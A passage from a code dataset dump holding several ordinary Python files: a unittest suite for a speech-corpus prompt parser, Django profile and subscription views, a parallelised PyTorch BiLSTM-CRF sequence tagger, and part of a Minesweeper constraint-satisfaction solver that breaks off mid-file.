str(count_tokens(preview_prompt)))\n\n\ndef rows_to_strings(df):\n return df.apply(lambda row: ' '.join(row.astype(str)), axis=1)\n\n\nif __name__ == '__main__':\n calculate_preview_stats()\n calculate_question_stats()\n calculate_answer_stats()\n\n","repo_name":"raz-zeevy/perovskite-miner","sub_path":"data/questions_stats.py","file_name":"questions_stats.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"43797900209","text":"import setupam.io\nimport setupam.speaker\n\n__author__ = 'Gabriel Araujo'\n\nimport unittest\nfrom unittest import mock as mk\n\n\nclass PromptsTest(unittest.TestCase):\n @mk.patch('setupam.speaker.Prompts._populate_from_files')\n @mk.patch('setupam.speaker.Prompts._populate_from_file')\n def test_prompts(self, mock_single_file, mock_multi_files):\n with self.assertRaises(KeyError):\n prompts = setupam.speaker.Prompts()\n prompts.populate()\n with self.assertRaises(KeyError):\n prompts = setupam.speaker.Prompts()\n prompts.populate('')\n\n with mk.patch('setupam.corpus.os.path.exists', return_value=True):\n prompts = setupam.speaker.Prompts()\n prompts.populate('', multi_path='', ext='')\n mock_single_file.assert_called_with('')\n mock_multi_files.assert_has_calls([])\n mock_single_file.reset_mock()\n\n with mk.patch('setupam.corpus.os.path.exists', return_value=False):\n prompts = setupam.speaker.Prompts()\n prompts.populate('', multi_path='')\n mock_multi_files.assert_called_with('', 'txt')\n mock_single_file.assert_has_calls([])\n mock_multi_files.reset_mock()\n\n\nclass SingleFilePromptsTest(unittest.TestCase):\n def setUp(self):\n self.prompts = setupam.speaker.Prompts()\n\n def test_valid_single(self):\n data = \"094 Vou tomar um pouquinho d'água. \\n095 Para onde a senhora quer ir? \\n\" + \\\n \"096 Que horas são? \\n\\n097 Amanhã é sexta.\\n16. Para onde a senhora quer ir?\"\n exp_dict = {'094': \"vou tomar um pouquinho d'água.\", '095': 'para onde a senhora quer ir?',\n '096': 'que horas são?', '097': 'amanhã é sexta.', '16': 'para onde a senhora quer ir?'}\n\n with mk.patch('setupam.speaker.os.path.exists', return_value=True):\n with mk.patch('setupam.speaker.open', mk.mock_open(read_data=data), create=True):\n self.prompts.populate('', multi_path='')\n self.assertEqual(self.prompts, exp_dict)\n\n def test_invalid_single(self):\n data = \"094 \\nPara onde a senhora quer ir?\\n096Que horas são?\\n\\n\"\n with mk.patch('setupam.speaker.os.path.exists', return_value=True):\n with mk.patch('setupam.speaker.open', mk.mock_open(read_data=data), create=True):\n self.prompts.populate('', multi_path='')\n self.assertEqual(self.prompts, {})\n\n\nclass MultiFilePromptsTest(unittest.TestCase):\n @mk.patch('setupam.io.track_files', return_value=['/home/user/test.txt'])\n @mk.patch('setupam.speaker.open', mk.mock_open(read_data=\"Vou tomar um pouquinho d'água\"), create=True)\n def test_multi(self, mock_track_files):\n multi = setupam.speaker.Prompts()\n multi.populate(multi_path='/home/user/')\n mock_track_files.assert_called_with('/home/user/', 'txt')\n self.assertTrue('test' in multi)\n self.assertEqual(multi['test'], \"vou tomar um pouquinho d'água\")\n\n\nclass AudiosTest(unittest.TestCase):\n\n def setUp(self):\n self.audios = setupam.speaker.Audios()\n\n def test_populate(self):\n return_list = ('/home/001.wav', '/home/audio.raw', 'file.mp3')\n with mk.patch('setupam.io.track_files', return_value=return_list):\n self.audios.populate('', '')\n self.assertEqual(\n tuple(self.audios),\n (('001', 'wav', '/home/001.wav'), ('audio', 'raw', '/home/audio.raw'), ('file', 'mp3', 'file.mp3')))\n\n\nclass MetadataTest(unittest.TestCase):\n\n def setUp(self):\n self.metadata = setupam.speaker.Metadata('')\n\n def test_populate(self):\n content_file = '''\n User Name:anonymous\n\n Speaker Characteristics:\n\n Gender: desconhecido\n Age Range: desconhecido\n Language: PT_BR\n Pronunciation dialect: desconhecido\n '''\n exp_dict = {\n 'USERNAME': 'anonymous',\n 'GENDER': 'desconhecido',\n 'AGE': 'desconhecido',\n 'LANGUAGE': 'PT_BR'\n }\n with mk.patch('setupam.speaker.open', mk.mock_open(read_data=content_file), create=True):\n self.metadata.populate('')\n self.assertEqual(self.metadata, exp_dict)\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"gabrielaraujof/setupam","sub_path":"tests/unit/setupam/speaker_test.py","file_name":"speaker_test.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"41135776675","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.db.models import Exists, OuterRef\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views.generic import UpdateView, DetailView\nfrom NPbd.models import Category, Subscription\n\nfrom .forms import UserForm\n\n\nclass ShowProfileView(DetailView):\n model = User\n template_name = 'profile.html'\n context_object_name = 'profile'\n\n\nclass ProfileEdit(UpdateView):\n form_class = UserForm\n model = User\n template_name = 'edit_profile.html'\n\n def get_success_url(self):\n return reverse('profile', args=[str(self.request.user.id)])\n\n\n@login_required\n@csrf_protect\ndef subscriptions(request):\n if request.method == 'POST':\n category_id = request.POST.get('category_id')\n category = Category.objects.get(id=category_id)\n action = request.POST.get('action')\n\n if action == 'subscribe':\n Subscription.objects.create(user=request.user, category=category)\n elif action == 'unsubscribe':\n Subscription.objects.filter(\n user=request.user,\n category=category,\n ).delete()\n\n categories_with_subscriptions = Category.objects.annotate(\n user_subscribed=Exists(\n Subscription.objects.filter(\n user=request.user,\n category=OuterRef('pk'),\n )\n )\n ).order_by('name')\n return render(\n request,\n 'subscriptions.html',\n {'categories': categories_with_subscriptions},\n )\n","repo_name":"GennadyIG/NewsPortal","sub_path":"NewsPaper/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25072689156","text":"import time\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\n\r\nSTART_TAG = \"\"\r\nSTOP_TAG = \"\"\r\n\r\n# torch.manual_seed(1)\r\n\r\ndef argmax(vec):\r\n # return the argmax as a python int\r\n _, idx = torch.max(vec, 1)\r\n return idx.item()\r\n\r\n\r\ndef prepare_sequence(seq, to_ix):\r\n idxs = [to_ix[w] for w in seq]\r\n return torch.tensor(idxs, dtype=torch.long)\r\n\r\ndef prepare_sequence_batch(data ,word_to_ix, tag_to_ix):\r\n seqs = [i[0] for i in data]\r\n tags = [i[1] for i in data]\r\n max_len = max([len(seq) for seq in seqs])\r\n seqs_pad=[]\r\n tags_pad=[]\r\n for seq,tag in zip(seqs, tags):\r\n seq_pad = seq + [''] * (max_len-len(seq))\r\n tag_pad = tag + [''] * (max_len-len(tag))\r\n seqs_pad.append(seq_pad)\r\n tags_pad.append(tag_pad)\r\n idxs_pad = torch.tensor([[word_to_ix[w] for w in seq] for seq in seqs_pad], dtype=torch.long)\r\n tags_pad = torch.tensor([[tag_to_ix[t] for t in tag] for tag in tags_pad], dtype=torch.long)\r\n return idxs_pad, tags_pad\r\n\r\n\r\n# Compute log sum exp in a numerically stable way for the forward algorithm\r\ndef log_sum_exp(vec):\r\n max_score = vec[0, argmax(vec)]\r\n max_score_broadcast = max_score.view(1, -1).expand(1, vec.size()[1])\r\n return max_score + \\\r\n torch.log(torch.sum(torch.exp(vec - max_score_broadcast)))\r\n\r\n\r\ndef log_add(args):\r\n return torch.log(torch.sum(torch.exp(args), axis=0))\r\n\r\n\r\n\r\nclass BiLSTM_CRF_MODIFY_PARALLEL(nn.Module):\r\n\r\n def __init__(self, vocab_size, tag_to_ix, embedding_dim, hidden_dim):\r\n super(BiLSTM_CRF_MODIFY_PARALLEL, self).__init__()\r\n self.embedding_dim = embedding_dim\r\n self.hidden_dim = hidden_dim\r\n self.vocab_size = vocab_size\r\n self.tag_to_ix = tag_to_ix\r\n self.tagset_size = len(tag_to_ix)\r\n\r\n self.word_embeds = nn.Embedding(vocab_size, embedding_dim)\r\n self.lstm = nn.LSTM(embedding_dim, hidden_dim // 2,\r\n num_layers=1, bidirectional=True, batch_first=True)\r\n\r\n # Maps the output of the LSTM into tag space.\r\n self.hidden2tag = nn.Linear(hidden_dim, self.tagset_size)\r\n\r\n # Matrix of transition parameters. Entry i,j is the score of\r\n # transitioning *to* i *from* j.\r\n self.transitions = nn.Parameter(\r\n torch.randn(self.tagset_size, self.tagset_size))\r\n\r\n # These two statements enforce the constraint that we never transfer\r\n # to the start tag and we never transfer from the stop tag\r\n\r\n self.transitions.data[tag_to_ix[START_TAG], :] = -10000\r\n self.transitions.data[:, tag_to_ix[STOP_TAG]] = -10000\r\n self.hidden = self.init_hidden()\r\n\r\n def init_hidden(self):\r\n return (torch.randn(2, 1, self.hidden_dim // 2),\r\n torch.randn(2, 1, self.hidden_dim // 2))\r\n\r\n def _forward_alg(self, feats):\r\n begin = time.time()\r\n # Do the forward algorithm to compute the partition function\r\n init_alphas = torch.full((1, self.tagset_size), -10000.).to('cuda')\r\n # START_TAG has all of the score.\r\n init_alphas[0][self.tag_to_ix[START_TAG]] = 0.\r\n\r\n # Wrap in a variable so that we will get automatic backprop\r\n forward_var = init_alphas\r\n # print('time consuming of crf_partion_function_prepare:%f' % (time.time() - begin))\r\n begin = time.time()\r\n # Iterate through the sentence\r\n for feat in feats:\r\n alphas_t = [] # The forward tensors at this timestep\r\n for next_tag in range(self.tagset_size):\r\n # broadcast the emission score: it is the same regardless of\r\n # the previous tag\r\n emit_score = feat[next_tag].view(\r\n 1, -1).expand(1, self.tagset_size)\r\n # the ith entry of trans_score is the score of transitioning to\r\n # next_tag from i\r\n trans_score = self.transitions[next_tag].view(1, -1)\r\n # The ith entry of next_tag_var is the value for the\r\n # edge (i -> next_tag) before we do log-sum-exp\r\n next_tag_var = (forward_var + trans_score + emit_score)\r\n # The forward variable for this tag is log-sum-exp of all the\r\n # scores.\r\n alphas_t.append(log_sum_exp(next_tag_var).view(1))\r\n forward_var = torch.cat(alphas_t).view(1, -1)\r\n # print('time consuming of crf_partion_function1:%f' % (time.time() - begin))\r\n terminal_var = forward_var + self.transitions[self.tag_to_ix[STOP_TAG]]\r\n alpha = log_sum_exp(terminal_var)\r\n # print('time consuming of crf_partion_function2:%f' %(time.time()-begin))\r\n return alpha\r\n\r\n def _forward_alg_new(self, feats):\r\n # Do the forward algorithm to compute the partition function\r\n init_alphas = torch.full([self.tagset_size], -10000.).to('cuda')\r\n # START_TAG has all of the score.\r\n init_alphas[self.tag_to_ix[START_TAG]] = 0.\r\n\r\n # Wrap in a variable so that we will get automatic backprop\r\n # Iterate through the sentence\r\n forward_var_list = []\r\n forward_var_list.append(init_alphas)\r\n for feat_index in range(feats.shape[0]): # -1\r\n gamar_r_l = torch.stack([forward_var_list[feat_index]] * feats.shape[1])\r\n # gamar_r_l = torch.transpose(gamar_r_l,0,1)\r\n t_r1_k = torch.unsqueeze(feats[feat_index], 0).transpose(0, 1) # +1\r\n aa = gamar_r_l + t_r1_k + self.transitions\r\n # forward_var_list.append(log_add(aa))\r\n forward_var_list.append(torch.logsumexp(aa, dim=1))\r\n terminal_var = forward_var_list[-1] + self.transitions[self.tag_to_ix[STOP_TAG]]\r\n terminal_var = torch.unsqueeze(terminal_var, 0)\r\n alpha = torch.logsumexp(terminal_var, dim=1)[0]\r\n return alpha\r\n\r\n def _forward_alg_new_parallel(self, feats):\r\n # Do the forward algorithm to compute the partition function\r\n init_alphas = torch.full([feats.shape[0], self.tagset_size], -10000.)#.to('cuda')\r\n # START_TAG has all of the score.\r\n init_alphas[:, self.tag_to_ix[START_TAG]] = 0.\r\n\r\n # Wrap in a variable so that we will get automatic backprop\r\n # Iterate through the sentence\r\n forward_var_list = []\r\n forward_var_list.append(init_alphas)\r\n for feat_index in range(feats.shape[1]): # -1\r\n gamar_r_l = torch.stack([forward_var_list[feat_index]] * feats.shape[2]).transpose(0, 1)\r\n # gamar_r_l = torch.transpose(gamar_r_l,0,1)\r\n t_r1_k = torch.unsqueeze(feats[:, feat_index, :], 1).transpose(1, 2) # +1\r\n # t_r1_k = feats[:,feat_index,:].repeat(feats.shape[0],1,1).transpose(1, 2)\r\n aa = gamar_r_l + t_r1_k + torch.unsqueeze(self.transitions, 0)\r\n # forward_var_list.append(log_add(aa))\r\n forward_var_list.append(torch.logsumexp(aa, dim=2))\r\n terminal_var = forward_var_list[-1] + self.transitions[self.tag_to_ix[STOP_TAG]].repeat([feats.shape[0], 1])\r\n # terminal_var = torch.unsqueeze(terminal_var, 0)\r\n alpha = torch.logsumexp(terminal_var, dim=1)\r\n return alpha\r\n\r\n\r\n def _get_lstm_features(self, sentence):\r\n self.hidden = self.init_hidden()\r\n embeds = self.word_embeds(sentence).unsqueeze(dim=0)\r\n #embeds = self.word_embeds(sentence).view(len(sentence), 1, -1).transpose(0,1)\r\n lstm_out, self.hidden = self.lstm(embeds)\r\n #lstm_out = lstm_out.view(embeds.shape[1], self.hidden_dim)\r\n lstm_out = lstm_out.squeeze()\r\n lstm_feats = self.hidden2tag(lstm_out)\r\n return lstm_feats\r\n\r\n def _get_lstm_features_parallel(self, sentence):\r\n self.hidden = self.init_hidden()\r\n embeds = self.word_embeds(sentence)\r\n lstm_out, self.hidden = self.lstm(embeds)\r\n lstm_feats = self.hidden2tag(lstm_out)\r\n return lstm_feats\r\n\r\n def _score_sentence(self, feats, tags):\r\n # Gives the score of a provided tag sequence\r\n score = torch.zeros(1)\r\n # score = autograd.Variable(torch.Tensor([0])).to('cuda')\r\n tags = torch.cat([torch.tensor([self.tag_to_ix[START_TAG]], dtype=torch.long), tags.view(-1)])\r\n\r\n # if len(tags)<2:\r\n # print(tags)\r\n # sys.exit(0)\r\n for i, feat in enumerate(feats):\r\n score = score + \\\r\n self.transitions[tags[i + 1], tags[i]] + feat[tags[i + 1]]\r\n score = score + self.transitions[self.tag_to_ix[STOP_TAG], tags[-1]]\r\n return score\r\n\r\n def _score_sentence_parallel(self, feats, tags):\r\n # Gives the score of provided tag sequences\r\n #feats = feats.transpose(0,1)\r\n\r\n score = torch.zeros(tags.shape[0])#.to('cuda')\r\n tags = torch.cat([torch.full([tags.shape[0],1],self.tag_to_ix[START_TAG], dtype=torch.long),tags],dim=1)\r\n for i in range(feats.shape[1]):\r\n feat=feats[:,i,:]\r\n score = score + \\\r\n self.transitions[tags[:,i + 1], tags[:,i]] + feat[range(feat.shape[0]),tags[:,i + 1]]\r\n score = score + self.transitions[self.tag_to_ix[STOP_TAG], tags[:,-1]]\r\n return score\r\n\r\n\r\n\r\n def _viterbi_decode(self, feats):\r\n backpointers = []\r\n\r\n # Initialize the viterbi variables in log space\r\n init_vvars = torch.full((1, self.tagset_size), -10000.)\r\n init_vvars[0][self.tag_to_ix[START_TAG]] = 0\r\n\r\n # forward_var at step i holds the viterbi variables for step i-1\r\n forward_var = init_vvars\r\n\r\n for feat in feats:\r\n bptrs_t = [] # holds the backpointers for this step\r\n viterbivars_t = [] # holds the viterbi variables for this step\r\n\r\n for next_tag in range(self.tagset_size):\r\n # next_tag_var[i] holds the viterbi variable for tag i at the\r\n # previous step, plus the score of transitioning\r\n # from tag i to next_tag.\r\n # We don't include the emission scores here because the max\r\n # does not depend on them (we add them in below)\r\n next_tag_var = forward_var.to('cuda') + self.transitions[next_tag]\r\n best_tag_id = argmax(next_tag_var)\r\n bptrs_t.append(best_tag_id)\r\n viterbivars_t.append(next_tag_var[0][best_tag_id].view(1))\r\n # Now add in the emission scores, and assign forward_var to the set\r\n # of viterbi variables we just computed\r\n forward_var = (torch.cat(viterbivars_t) + feat).view(1, -1)\r\n backpointers.append(bptrs_t)\r\n\r\n # Transition to STOP_TAG\r\n terminal_var = forward_var + self.transitions[self.tag_to_ix[STOP_TAG]]\r\n best_tag_id = argmax(terminal_var)\r\n path_score = terminal_var[0][best_tag_id]\r\n\r\n # Follow the back pointers to decode the best path.\r\n best_path = [best_tag_id]\r\n for bptrs_t in reversed(backpointers):\r\n best_tag_id = bptrs_t[best_tag_id]\r\n best_path.append(best_tag_id)\r\n # Pop off the start tag (we dont want to return that to the caller)\r\n start = best_path.pop()\r\n assert start == self.tag_to_ix[START_TAG] # Sanity check\r\n best_path.reverse()\r\n return path_score, best_path\r\n\r\n def _viterbi_decode_new(self, feats):\r\n backpointers = []\r\n\r\n # Initialize the viterbi variables in log space\r\n init_vvars = torch.full((1, self.tagset_size), -10000.)#.to('cuda')\r\n init_vvars[0][self.tag_to_ix[START_TAG]] = 0\r\n\r\n # forward_var at step i holds the viterbi variables for step i-1\r\n forward_var_list = []\r\n forward_var_list.append(init_vvars)\r\n\r\n for feat_index in range(feats.shape[0]):\r\n gamar_r_l = torch.stack([forward_var_list[feat_index]] * feats.shape[1])\r\n gamar_r_l = torch.squeeze(gamar_r_l)\r\n next_tag_var = gamar_r_l + self.transitions\r\n # bptrs_t=torch.argmax(next_tag_var,dim=0)\r\n viterbivars_t, bptrs_t = torch.max(next_tag_var, dim=1)\r\n\r\n t_r1_k = torch.unsqueeze(feats[feat_index], 0)\r\n forward_var_new = torch.unsqueeze(viterbivars_t, 0) + t_r1_k\r\n\r\n forward_var_list.append(forward_var_new)\r\n backpointers.append(bptrs_t.tolist())\r\n\r\n # Transition to STOP_TAG\r\n terminal_var = forward_var_list[-1] + self.transitions[self.tag_to_ix[STOP_TAG]]\r\n best_tag_id = torch.argmax(terminal_var).tolist()\r\n path_score = terminal_var[0][best_tag_id]\r\n\r\n # Follow the back pointers to decode the best path.\r\n best_path = [best_tag_id]\r\n for bptrs_t in reversed(backpointers):\r\n best_tag_id = bptrs_t[best_tag_id]\r\n best_path.append(best_tag_id)\r\n # Pop off the start tag (we dont want to return that to the caller)\r\n start = best_path.pop()\r\n assert start == self.tag_to_ix[START_TAG] # Sanity check\r\n best_path.reverse()\r\n return path_score, best_path\r\n\r\n def neg_log_likelihood(self, sentence, tags):\r\n feats = self._get_lstm_features(sentence)\r\n forward_score = self._forward_alg_new(feats)\r\n gold_score = self._score_sentence(feats, tags)[0]\r\n return forward_score - gold_score\r\n\r\n def neg_log_likelihood_parallel(self, sentences, tags):\r\n feats = self._get_lstm_features_parallel(sentences)\r\n forward_score = self._forward_alg_new_parallel(feats)\r\n gold_score = self._score_sentence_parallel(feats, tags)\r\n return torch.sum(forward_score - gold_score)\r\n\r\n def forward(self, sentence): # dont confuse this with _forward_alg above.\r\n # Get the emission scores from the BiLSTM\r\n lstm_feats = self._get_lstm_features(sentence)\r\n\r\n # Find the best path, given the features.\r\n score, tag_seq = self._viterbi_decode_new(lstm_feats)\r\n return score, tag_seq\r\n\r\nif __name__ == '__main__':\r\n START_TAG = \"\"\r\n STOP_TAG = \"\"\r\n PAD_TAG = \"\"\r\n EMBEDDING_DIM = 300\r\n HIDDEN_DIM = 256\r\n\r\n # Make up some training data\r\n training_data = [(\r\n \"the wall street journal reported today that apple corporation made money\".split(),\r\n \"B I I I O O O B I O O\".split()\r\n ), (\r\n \"georgia tech is a university in georgia\".split(),\r\n \"B I O O O O B\".split()\r\n )]\r\n\r\n word_to_ix = {}\r\n word_to_ix[''] = 0\r\n for sentence, tags in training_data:\r\n for word in sentence:\r\n if word not in word_to_ix:\r\n word_to_ix[word] = len(word_to_ix)\r\n\r\n tag_to_ix = {\"B\": 0, \"I\": 1, \"O\": 2, START_TAG: 3, STOP_TAG: 4, PAD_TAG: 5}\r\n\r\n model = BiLSTM_CRF_MODIFY_PARALLEL(len(word_to_ix), tag_to_ix, EMBEDDING_DIM, HIDDEN_DIM)\r\n optimizer = optim.SGD(model.parameters(), lr=0.01, weight_decay=1e-4)\r\n\r\n # Check predictions before training\r\n with torch.no_grad():\r\n precheck_sent = prepare_sequence(training_data[0][0], word_to_ix)\r\n precheck_tags = torch.tensor([tag_to_ix[t] for t in training_data[0][1]], dtype=torch.long)\r\n print(model(precheck_sent))\r\n\r\n # Make sure prepare_sequence from earlier in the LSTM section is loaded\r\n for epoch in range(\r\n 300): # again, normally you would NOT do 300 epochs, it is toy data\r\n # Step 1. Remember that Pytorch accumulates gradients.\r\n # We need to clear them out before each instance\r\n model.zero_grad()\r\n # Step 2. Get our batch inputs ready for the network, that is,\r\n # turn them into Tensors of word indices.\r\n # If training_data can't be included in one batch, you need to sample them to build a batch\r\n sentence_in_pad, targets_pad = prepare_sequence_batch(training_data, word_to_ix, tag_to_ix)\r\n # Step 3. Run our forward pass.\r\n loss = model.neg_log_likelihood_parallel(sentence_in_pad, targets_pad)\r\n # Step 4. Compute the loss, gradients, and update the parameters by\r\n # calling optimizer.step()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n # Check predictions after training\r\n with torch.no_grad():\r\n precheck_sent = prepare_sequence(training_data[0][0], word_to_ix)\r\n print(model(precheck_sent))\r\n # We got it!\r\n","repo_name":"mali19064/LSTM-CRF-pytorch-faster","sub_path":"LSTM_CRF_faster_parallel.py","file_name":"LSTM_CRF_faster_parallel.py","file_ext":"py","file_size_in_byte":16373,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"32"} +{"seq_id":"4040671115","text":"import csp\nimport minemap\nimport solutionset\nimport sys\n\n'''\nThis implementation of a CSP solver implements the approach outlined in \n\"Minesweeper as a Constraint Satisfaction Problem\" by Chris Studholme, Ph.D from \nthe University of Toronto.\n\n@File: cspstrategy.py \n@Use: This class implements the CSP strategy to be used by PGMS\n'''\n\n# If True, will print more messages\nVERBOSE = False\n\n# Used for a print message\nSOLVE_THRESHOLD = 20\n\n\nclass CSPStrategy(object):\n\t\n\tdef __init__(self):\n\t\t# list of constraints remaining\n\t\tself.constraints = []\n\n\tdef play1(self, m):\n\t\tself.play2(m, 0, 0, False)\n\n\t# Play a hinted game.\n\tdef play2(self,m, hint_column, hint_row, not_first):\n\t\tself.map = m\n\n\n\t\t# initialize SolutionSet statics\n\t\tsolutionset.largest_neqns = 0\n\t\tsolutionset.largest_nvars = 0\n\t\tsolutionset.largest_nsols = 0\n\n\t\t# initialize board\n\t\tcspboard = csp.CSPBoard()\n\t\tcspboard.CreateBoard(self.map)\n\n\n\t\tif VERBOSE:\n\t\t\tprint(\"================ NEW GAME ================\")\n\n\t\t# use hint\n\t\tif cspboard.board[hint_column][hint_row].probe(self.map) == minemap.BOOM and m.realrules:\n\t\t\tmap2 = minemap.MineMap(m.mines,m.rows,m.cols,m.realrules, True)\n\t\t\tself.play2(map2,hint_column,hint_row)\n\t\t\tm.cleared = map2.cleared\n\t\t\tm.victory = map2.victory\n\t\t\treturn\n\n\t\t# initialize constraints\n\t\tfor x in range(self.map.cols):\n\t\t\tfor y in range(self.map.rows):\n\t\t\t\tself.addConstraint(cspboard.board[x][y].newConstraint())\n\n\t\t# main loop\n\t\twhile not self.map.done():\n\t\t\t# Simplify constraints by combining with each other and\n\t\t\t# marking or probing _obvious_ mines and cleared areas.\n\t\t\tself.simplifyConstraints()\n\t\t\tif self.map.done():\n\t\t\t\tbreak\n\n\t\t\t# At this point the constraints are as simple as possible and\n\t\t\t# the choice of next move is _not_ obvious. All solutions to\n\t\t\t# the CSP must be found to determine if there are any _safe_\n\t\t\t# moves.\n\t\t\t# Seperate the constraints into coupled subsets, each represented\n\t\t\t# by a SolutionSet object.\n\t\t\tsubsets = self.seperateConstraints()\n\t\t\tnsubsets = len(subsets)\n\n\t\t\tif nsubsets <= 0:\n\t\t\t\t# This happens when all remaining (unknown) clear positions \n\t\t\t\t# are seperated (by mines) from the known clear positions.\n\t\t\t\tif VERBOSE:\n\t\t\t\t\tprint(\"No problems to solve!\")\n\t\t\telse:\n\t\t\t\tsolving_msg = False\n\t\t\t\tif VERBOSE:\n\t\t\t\t\t# determine number of variables in largest subproblem\n\t\t\t\t\tnvars = subsets[0].getVariableCount()\n\t\t\t\t\tncnts = subsets[0].getConstraintCount()\n\t\t\t\t\tfor i in range(1, nsubsets):\n\t\t\t\t\t\tif (subsets[i].getVariableCount() - subsets[i].getConstraintCount()) > nvars - ncnts:\n\t\t\t\t\t\t\tnvars = subsets[i].getVariableCount()\n\t\t\t\t\t\t\tncnts = subsets[i].getConstraintCount()\n\n\t\t\t\t\tif nvars - ncnts >= SOLVE_THRESHOLD:\n\t\t\t\t\t\tsolving_msg = True\n\t\t\t\t\t\tif nsubsets == 1:\n\t\t\t\t\t\t\tprint(\"Solving \"+str(ncnts)+\" constraint \"+\n\t\t\t\t\t\t\t\tstr(nvars)+\" variable system...\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Solving \" + str(nsubsets) + \n\t\t\t\t\t\t\t\t\" systems (largest is \"+str(ncnts)+\" constraints \"\n\t\t\t\t\t\t\t\t\t+str(nvars)+\" variables)...\")\n\n\t\t\t\t# Solve each of the sub-problems by enumerating all solutions\n\t\t\t\t# to the constraint satisfaction problem.\n\t\t\t\tfor subset in subsets:\n\t\t\t\t\tsubset.enumerateSolutions()\n\t\t\t\tif solving_msg:\n\t\t\t\t\tprint(\" done.\")\n\n\t\t\t# Account for all remaining mines. It may be found that some\n\t\t\t# sub-problems have solutions that require too many or too few\n\t\t\t# mines. In these cases, some solutions will be deleted from\n\t\t\t# the SolutionSet. \n\t\t\t# The number of mines expected to be found in the unknown\n\t\t\t# positions is also calculated.\n\t\t\tremaining = self.map.mines_minus_marks()\n\t\t\tfar = cspboard.nonConstrainedCount()\n\t\t\tfar_max = remaining\n\t\t\tfar_expected = float(remaining)\n\t\t\tfor i in range(nsubsets):\n\t\t\t\tnmin = 0\n\t\t\t\tnmax = far\n\t\t\t\tfor j in range(nsubsets):\n\t\t\t\t\tif i != j:\n\t\t\t\t\t\tnmin += subsets[j].getMin()\n\t\t\t\t\t\tnmax += subsets[j].getMax()\n\t\t\t\tsubsets[i].reduceMinMax(remaining - nmax, remaining - nmin)\n\t\t\t\tfar_expected -= subsets[i].expectedMines()\n\t\t\t\tfar_max -= subsets[i].getMin()\n\n\t\t\t# Using far_expected here seems to work better, but sometimes\n\t\t\t# yields negative probabilities. far_max doesn't have this\n\t\t\t# problem, but doesn't work as well.\n\t\t\tfar_prob = far_expected/float(far) if far > 0 else 1\n\t\t\tif far_prob < 0.01: far_prob = float(0.01)\n\n\t\t\t# Do any craps shoots. Even if we survive these, we are no\n\t\t\t# better off.\n\t\t\tcrapshoot = False\n\t\t\tfor i in reversed(range(nsubsets)):\n\t\t\t\tc = subsets[i].doCrapsShoot(self.map)\n\t\t\t\tif c != None:\n\t\t\t\t\tself.addConstraint(c)\n\t\t\t\t\t# throw away subset so we don't do anything with it\n\t\t\t\t\t# again until the constraints are next simplified\n\t\t\t\t\tnsubsets -= 1\n\t\t\t\t\tsubsets.pop(i)\n\t\t\t\t\tcrapshoot = True\n\t\t\t\telif self.map.done():\n\t\t\t\t\tbreak\n\n\t\t\tif self.map.done():\n\t\t\t\tbreak;\n\t\t\tif nsubsets <= 0 and crapshoot:\n\t\t\t\tcontinue\n\n\t\t\t# Mark for-sure mines. \n\t\t\tfor i in range(nsubsets):\n\t\t\t\tsubsets[i].markMines(self.map)\n\n\t\t\t# If no mines are left in the unknown positions, probe them all.\n\t\t\t# This is very good for us and we go back to simplification\n\t\t\t# immediately afterwards.\n\t\t\tif far_max <= 0 and far > 0:\n\t\t\t\tpositions = cspboard.enumerateUnknown()\n\t\t\t\tfor position in positions:\n\t\t\t\t\tposition.probe(self.map)\n\t\t\t\t\tself.addConstraint(position.newConstraint())\n\t\t\t\tcontinue\n\n\t\t\t# Determine best position to make a probe (a guess).\n\t\t\tbest_subset = -1\n\t\t\tbest_prob = far_prob\n\t\t\tsurething = False\n\t\t\tfor i in range(nsubsets):\n\t\t\t\tprob = subsets[i].findBestProbe()\n\t\t\t\tif prob <= 0:\n\t\t\t\t\tsurething = True\n\t\t\t\t\tself.addConstraint(subsets[i].doBestProbe(self.map))\n\t\t\t\telif prob <= best_prob:\n\t\t\t\t\tbest_prob = prob\n\t\t\t\t\tbest_subset = i\n\t\t\tif surething:\n\t\t\t\tcontinue\n\n\t\t\t# If best guess is a constrained position, probe it.\n\t\t\tif best_subset >= 0:\n\t\t\t\tif VERBOSE:\n\t\t\t\t\tprint(\"GUESS: \"+str(int((1-best_prob)*100))+\"% educated ...\")\n\t\t\t\tc = subsets[best_subset].doBestProbe(self.map)\n\t\t\t\tif c != None:\n\t\t\t\t\tself.addConstraint(c)\n\t\t\t\t\tif VERBOSE: print(\" good.\")\n\t\t\t\telif VERBOSE: print(\" FAILED\")\n\n\t\t\t# Otherwise, we probe one of the unknown positions.\n\t\t\telse:\n\t\t\t\t# first check the corners\n\t\t\t\tpositions = cspboard.enumerateCorners()\n\t\t\t\tcategory = \"corner\"\n\t\t\t\tif positions == None:\n\t\t\t\t\t# next check for edges\n\t\t\t\t\tpositions = cspboard.enumerateEdges()\n\t\t\t\t\tcategory = \"edge\"\n\t\t\t\tif positions == None:\n\t\t\t\t\t# next check for a boundary position\n\t\t\t\t\tpositions = cspboard.enumerateMaxBoundary()\n\t\t\t\t\tcategory = \"boundary\"\n\t\t\t\tif positions == None:\n\t\t\t\t\t# finally, if all else fails, probe some random position\n\t\t\t\t\tpositions = cspboard.enumerateUnknown()\n\t\t\t\t\tcategory = \"far\"\n\t\t\t\tif positions == None:\n\t\t\t\t\tprint(\"WHAT! No boundary or unknown?\")\n\n\t\t\t\tif VERBOSE:\n\t\t\t\t\tprint(\"GUESS: \"+str(int((1-best_prob)*100))+\"% \"+category+\" ...\")\n\t\t\t\ti = self.map.pick(len(positions))\n\t\t\t\ts = positions[i].probe(self.map)\n\t\t\t\tif s >= 0:\n\t\t\t\t\tself.addConstraint(positions[i].newConstraint())\n\t\t\t\t\tif VERBOSE:\n\t\t\t\t\t\tprint(\" 